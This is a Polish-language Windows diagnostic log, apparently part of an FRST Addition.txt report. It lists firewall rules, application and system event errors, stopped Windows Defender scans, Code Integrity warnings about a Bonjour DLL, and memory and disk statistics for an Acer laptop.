[{33CEAD73-7E47-45B6-943D-562C0C8A1D1B}] => (Allow) C:\Program Files (x86)\Acer\AOP Framework\acer\ccd.exe FirewallRules: [{8C43DB37-0428-46DD-B874-296981867ABA}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe FirewallRules: [{1D4F0E60-ED19-4054-B8AE-935CB28B168C}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\DMCDaemon.exe FirewallRules: [{15E7FCDD-47C8-42C2-A4CB-7CBA889F033B}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe FirewallRules: [{9840B8CA-4558-46C1-8BFB-B55917EA44A3}] => (Allow) C:\Program Files (x86)\Acer\abPhoto\WindowsUpnp.exe FirewallRules: [{4D355C48-6F18-436C-98F1-498290333A2F}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{F99F97A2-6614-4F8E-BE46-551DB65121B5}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{93B11EE4-8721-42CF-A6FB-089E583E5965}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe FirewallRules: [{D042F384-1D74-4A06-BAC2-D46D0FB11153}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{7B603B39-9C9A-4A4A-8B3F-E7FF5A11F869}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe FirewallRules: [{635ED1DB-C07E-4CA2-998A-31A6794D6517}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dev Guy\Binaries\Win64\Dev Guy.exe FirewallRules: [{4D87297C-776D-48B0-82BB-C1DA817FB1B4}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Dev Guy\Binaries\Win64\Dev Guy.exe FirewallRules: [{B851DAD0-D2BB-4E77-B091-1F3344992451}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{FA6BF577-245E-471A-B8FE-B6FC49AC1F6B}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{BEA5D42A-6F5F-45E7-AAF8-B0A427557DA7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{6890C41E-F8B6-4A57-8E23-A3B27DFE1BBF}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{DE957C97-F97C-4B32-B9DC-D825F0ACD568}] => (Allow) C:\Program Files\iTunes\iTunes.exe FirewallRules: [{A678B29C-A818-48F1-8DC7-FD42DC8ABA2D}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe FirewallRules: [{E2125CE7-3A5A-4287-B777-E26BEC78E30E}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{1B9CCB89-37CC-4A45-9569-82FB9FA968CD}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{4CBBBFE4-782D-4AA1-B8B1-096392CACF64}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{F01B3DEC-9A3C-4D08-80B6-FF1A3D8437FB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{0515861C-9BAE-417D-9A92-D56FF90615F8}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe ==================== Punkty Przywracania systemu ========================= Sprawdź usługę "winmgmt" lub napraw WMI. ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Niepowodzenie przy listowaniu urządzeń. Sprawdź usługę "winmgmt" lub napraw WMI. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (03/26/2018 11:42:23 PM) (Source: Microsoft Office 16) (EventID: 2001) (User: ) Description: Microsoft Word: Rejected Safe Mode action : Poprawne uruchomienie programu Word ostatnim razem nie powiodło się. Uruchomienie w trybie awaryjnym pomoże naprawić problem, jednak niektóre funkcje mogą być w tym trybie niedostępne. Czy chcesz uruchomić w trybie awaryjnym?. Rejected Safe Mode action : Microsoft Word. Error: (03/26/2018 11:40:07 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: QASvc.exe, wersja: 2.1.3007.0, sygnatura czasowa: 0x5792396e Nazwa modułu powodującego błąd: QASvc.exe, wersja: 2.1.3007.0, sygnatura czasowa: 0x5792396e Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000000e922 Identyfikator procesu powodującego błąd: 0x6b4 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3c54b016d1a8b Ścieżka aplikacji powodującej błąd: C:\Program Files\Acer\Acer Quick Access\QASvc.exe Ścieżka modułu powodującego błąd: C:\Program Files\Acer\Acer Quick Access\QASvc.exe Identyfikator raportu: 53326b55-4da6-4379-ba34-3d972ae8494c Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (03/26/2018 11:39:58 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: FreemakeUtilsService.exe, wersja: 1.0.0.0, sygnatura czasowa: 0x5892bb64 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.16299.309, sygnatura czasowa: 0xd3aa915c Kod wyjątku: 0xe0434352 Przesunięcie błędu: 0x001008f2 Identyfikator procesu powodującego błąd: 0xcc4 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3c54af94071fb Ścieżka aplikacji powodującej błąd: C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll Identyfikator raportu: ec9deca6-8e09-4959-9053-c5237bd330ce Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (03/26/2018 11:39:58 PM) (Source: .NET Runtime) (EventID: 1026) (User: ) Description: Aplikacja: FreemakeUtilsService.exe Wersja architektury: v4.0.30319 Opis: proces został przerwany z powodu nieobsłużonego wyjątku. Informacje o wyjątku: System.Management.ManagementException w System.Management.ManagementException.ThrowWithExtendedInfo(System.Management.ManagementStatus) w System.Management.ManagementScope.InitializeGuts(System.Object) w System.Management.ManagementScope.Initialize() w System.Management.ManagementObjectSearcher.Initialize() w System.Management.ManagementObjectSearcher.Get() w FreemakeUtilsService.Common.ToolbarInstallationChecker.GetLoggedOnUsersList() w FreemakeUtilsService.Common.ToolbarInstallationChecker.CollectInformation() w FreemakeUtilsService.Common.ToolbarInstallationChecker.CheckInfo(FreemakeUtilsService.Common.FreemakeToolbarsInfo) w FreemakeUtilsService.Statistics.Manager.StartToolbarInfoCheck() w FreemakeUtilsService.Statistics.Manager.SettingsSyncFailed(System.Object, System.EventArgs) w FreemakeUtilsService.Common.Synchronizer.OnWorkerCompleted(System.Object, System.ComponentModel.RunWorkerCompletedEventArgs) w System.ComponentModel.BackgroundWorker.OnRunWorkerCompleted(System.ComponentModel.RunWorkerCompletedEventArgs) w System.ComponentModel.BackgroundWorker.AsyncOperationCompleted(System.Object) w System.Threading.QueueUserWorkItemCallback.WaitCallback_Context(System.Object) w System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean) w System.Threading.QueueUserWorkItemCallback.System.Threading.IThreadPoolWorkItem.ExecuteWorkItem() w System.Threading.ThreadPoolWorkQueue.Dispatch() w System.Threading._ThreadPoolWaitCallback.PerformWaitCallback() Error: (03/26/2018 11:39:53 PM) (Source: Aktualizacja Programu Płatnik) (EventID: 0) (User: ) Description: Nie można uruchomić usługi. Nieprawidłowe dojście Error: (03/26/2018 11:37:50 PM) (Source: Microsoft Office 16) (EventID: 2001) (User: ) Description: Microsoft Word: Rejected Safe Mode action : Poprawne uruchomienie programu Word ostatnim razem nie powiodło się. Uruchomienie w trybie awaryjnym pomoże naprawić problem, jednak niektóre funkcje mogą być w tym trybie niedostępne. Czy chcesz uruchomić w trybie awaryjnym?. Rejected Safe Mode action : Microsoft Word. Error: (03/26/2018 11:16:30 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: QASvc.exe, wersja: 2.1.3007.0, sygnatura czasowa: 0x5792396e Nazwa modułu powodującego błąd: QASvc.exe, wersja: 2.1.3007.0, sygnatura czasowa: 0x5792396e Kod wyjątku: 0xc0000005 Przesunięcie błędu: 0x000000000000e922 Identyfikator procesu powodującego błąd: 0x1a2c Godzina uruchomienia aplikacji powodującej błąd: 0x01d3c547b53b82ed Ścieżka aplikacji powodującej błąd: C:\Program Files\Acer\Acer Quick Access\QASvc.exe Ścieżka modułu powodującego błąd: C:\Program Files\Acer\Acer Quick Access\QASvc.exe Identyfikator raportu: 34dbe66c-2513-4537-a731-495eae859796 Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Error: (03/26/2018 11:16:24 PM) (Source: Application Error) (EventID: 1000) (User: ) Description: Nazwa aplikacji powodującej błąd: FreemakeUtilsService.exe, wersja: 1.0.0.0, sygnatura czasowa: 0x5892bb64 Nazwa modułu powodującego błąd: KERNELBASE.dll, wersja: 10.0.16299.309, sygnatura czasowa: 0xd3aa915c Kod wyjątku: 0xe0434352 Przesunięcie błędu: 0x001008f2 Identyfikator procesu powodującego błąd: 0xcd8 Godzina uruchomienia aplikacji powodującej błąd: 0x01d3c547ae771cc3 Ścieżka aplikacji powodującej błąd: C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe Ścieżka modułu powodującego błąd: C:\WINDOWS\System32\KERNELBASE.dll Identyfikator raportu: 3a888ece-0d93-4ea1-8565-5cb20dfe162d Pełna nazwa pakietu powodującego błąd: Identyfikator aplikacji względem pakietu powodującego błąd: Dziennik System: ============= Error: (03/27/2018 12:01:30 AM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (03/26/2018 11:55:03 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (03/26/2018 11:46:04 PM) (Source: DCOM) (EventID: 10010) (User: LAPTOP-5ILJ21CV) Description: Serwer {4991D34B-80A1-4291-83B6-3328366B9097} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (03/26/2018 11:44:54 PM) (Source: DCOM) (EventID: 10016) (User: LAPTOP-5ILJ21CV) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {D63B10C5-BB46-4990-A94F-E40B9D520160} i identyfikatorem aplikacji APPID {9CA88EE3-ACB7-47C8-AFC4-AB702511C276} użytkownikowi LAPTOP-5ILJ21CV\acer o identyfikatorze zabezpieczeń SID (S-1-5-21-3582310716-3901469781-3033083607-1008) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Error: (03/26/2018 11:44:29 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Quick Access Service niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (03/26/2018 11:44:02 PM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa Optymalizacja dostarczania zawiesiła się podczas uruchamiania. Error: (03/26/2018 11:40:09 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa Freemake Improver niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (03/26/2018 11:39:59 PM) (Source: DCOM) (EventID: 10016) (User: ZARZĄDZANIE NT) Description: Zgodnie z ustawieniami uprawnienia właściwe dla aplikacji nie jest udzielane uprawnienie Lokalny Aktywacja do aplikacji serwera COM z identyfikatorem klasy CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} i identyfikatorem aplikacji APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} użytkownikowi ZARZĄDZANIE NT\USŁUGA LOKALNA o identyfikatorze zabezpieczeń SID (S-1-5-19) z adresu LocalHost (użycie LRPC) działającemu w kontenerze aplikacji o identyfikatorze SID Niedostępny (Niedostępny). To uprawnienie zabezpieczeń można modyfikować przy użyciu narzędzia administracyjnego Usługi składowe. Windows Defender: =================================== Date: 2018-03-19 12:00:40.737 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {DDC716C7-838A-435E-AE80-2C4DF7805C50} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2018-03-16 11:41:33.823 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {216CED70-C51E-4437-8419-AC77EDBD7102} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2018-03-16 11:30:57.795 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {E5F0671E-5D70-45EA-97B2-BD02D1A9E1A8} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2018-03-14 12:19:17.307 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {53B5F0D3-ECE0-47AD-8F19-B9941E324B75} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2018-03-14 11:40:05.366 Description: Skanowanie produktu Program antywirusowy Windows Defender zostało zatrzymane przed ukończeniem. Identyfikator skanowania: {9E5C8F85-9247-4EEE-8857-F0111247D749} Typ skanowania: Narzędzia chroniące przed złośliwym oprogramowaniem Parametry skanowania: Szybkie skanowanie Użytkownik: ZARZĄDZANIE NT\SYSTEM Date: 2018-03-26 22:26:27.293 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.263.1176.0 Źródło aktualizacji: Serwer usługi Microsoft Update Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\SYSTEM Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.14600.4 Kod błędu: 0x80240016 Opis błędu: Podczas sprawdzania aktualizacji wystąpił nieoczekiwany problem. Aby uzyskać informacje na temat instalowania aktualizacji i rozwiązywania problemów z nimi, zobacz Pomoc i obsługę techniczną. Date: 2018-03-14 13:20:07.735 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: System inspekcji sieci Kod błędu: 0x8007045b Opis błędu: Trwa proces zamykania systemu. Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2018-03-14 13:20:07.735 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Monitorowanie zachowania Kod błędu: 0x8007045b Opis błędu: Trwa proces zamykania systemu. Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2018-03-14 13:20:07.735 Description: Agent ochrony w czasie rzeczywistym produktu Program antywirusowy Windows Defender wykrył błąd i jego uruchomienie nie powiodło się. Funkcja: Przy dostępie Kod błędu: 0x8007045b Opis błędu: Trwa proces zamykania systemu. Przyczyna: Ochrona przed złośliwym kodem przestała działać z nieznanej przyczyny. W niektórych przypadkach problem można rozwiązać, uruchamiając ponownie usługę. Date: 2018-02-17 14:53:12.896 Description: Produkt Program antywirusowy Windows Defender napotkał błąd podczas próby aktualizacji podpisów. Nowa wersja podpisu: Poprzednia wersja podpisu: 1.261.1303.0 Źródło aktualizacji: Centrum firmy Microsoft ds. ochrony przed złośliwym oprogramowaniem Typ podpisu: Oprogramowanie antywirusowe Typ aktualizacji: Pełne Użytkownik: ZARZĄDZANIE NT\USŁUGA SIECIOWA Bieżąca wersja aparatu: Poprzednia wersja aparatu: 1.1.14500.5 Kod błędu: 0x80072ee7 Opis błędu: Nie można określić nazwy serwera lub adresu. CodeIntegrity: =================================== Date: 2018-03-26 23:53:34.408 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:53:34.407 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:50:25.203 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:50:25.200 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:46:01.814 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:46:01.812 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:44:21.459 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. Date: 2018-03-26 23:44:21.458 Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements. ==================== Statystyki pamięci =========================== Procesor: Intel(R) Core(TM) i3-5005U CPU @ 2.00GHz Procent pamięci w użyciu: 88% Całkowita pamięć fizyczna: 4010.45 MB Dostępna pamięć fizyczna: 446.47 MB Całkowita pamięć wirtualna: 7722.45 MB Dostępna pamięć wirtualna: 2868.81 MB ==================== Dyski ================================ Drive c: (Acer) (Fixed) (Total:930.4 GB) (Free:828.31 GB) NTFS \\?\Volume{cb864e72-d55b-4a1f-ba72-fb49d52006f8}\ (ESP) (Fixed) (Total:0.09 GB) (Free:0.05 GB) FAT32 \\?\Volume{b1e284d4-5242-48b6-badd-2786baf1025b}\ (Recovery) (Fixed) (Total:1 GB) (Free:0.6 GB) NTFS ==================== MBR & Tablica partycji ================== ======================================================== Disk: 0 (Size: 931.5 GB) (Disk ID: 8C60FCBD) Partition: GPT. ==================== Koniec Addition.txt ============================